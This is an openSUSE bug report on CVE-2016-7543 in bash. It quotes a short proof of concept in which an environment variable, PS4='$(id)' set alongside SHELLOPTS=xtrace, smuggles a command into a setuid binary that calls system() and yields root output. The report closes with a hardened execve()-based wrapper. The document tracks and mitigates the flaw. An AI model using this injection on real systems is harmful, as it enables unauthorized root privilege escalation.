Bug ID 1001299
Summary VUL-0: CVE-2016-7543: bash SHELLOPTS+PS4
Classification openSUSE
Product openSUSE Distribution
Version Leap 42.1
Hardware Other
OS Other
Status NEW
Severity Normal
Priority P5 - None
Component Security
Assignee security-team@suse.de
Reporter mikhail.kasimov@gmail.com
QA Contact qa-bugs@suse.de
Found By ---
Blocker ---

Reference: http://seclists.org/oss-sec/2016/q3/617

===================
The recent bash 4.4 patched an old attack vector regarding
specially crafted SHELLOPTS+PS4 environment variables
against bogus setuid binaries using system()/popen().

https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html

"nn. Shells running as root no longer inherit PS4 from the environment,
closing a security hole involving PS4 expansion performing command
substitution."

# gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
# chmod 4755 ./test
# ls -l ./test
-rwsr-xr-x. 1 root root 8549 Sep 10 18:06 ./test
# exit
$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
uid=0(root)
Sat Sep 10 18:06:36 WET 2016

Sorry Tavis :P

===================

I've tried to reproduce this issue on the release bash version in 42.1 --
4.2.47(1)-release (x86_64-suse-linux-gnu) -- but the first line (gcc -xc...)
returned a command line dialogue instead of the test file. So please try to
reproduce this issue on your own side. Thanks!
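
A hardened counterpart to the `test` wrapper in the quoted transcript, added here as an example (not code from the oss-sec post or from bash): it runs the command with execve() and a fixed environment instead of system(), so no shell is started and nothing from the caller's SHELLOPTS or PS4 reaches the child. The names `run_clean` and `CLEAN_ENV` and the contents of the fixed environment are assumptions made for this example.

```c
#include <errno.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment handed to the child (assumed values for this example).
   Nothing is copied from the caller, so SHELLOPTS and PS4 cannot pass through. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", "LANG=C", NULL };

/* Run `path` with `argv` directly, without /bin/sh in between.
   Returns the child's exit status, 127 if the exec failed,
   or -1 on fork/wait failure or abnormal termination. */
int run_clean(const char *path, char *const argv[])
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, CLEAN_ENV);
        _exit(127);                      /* only reached when execve fails */
    }
    while (waitpid(pid, &status, 0) < 0) {
        if (errno != EINTR)              /* retry only when interrupted */
            return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Same job as the wrapper in the transcript: print the date. */
int main(void)
{
    char *const argv[] = { "date", NULL };
    return run_clean("/bin/date", argv);
}
```
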

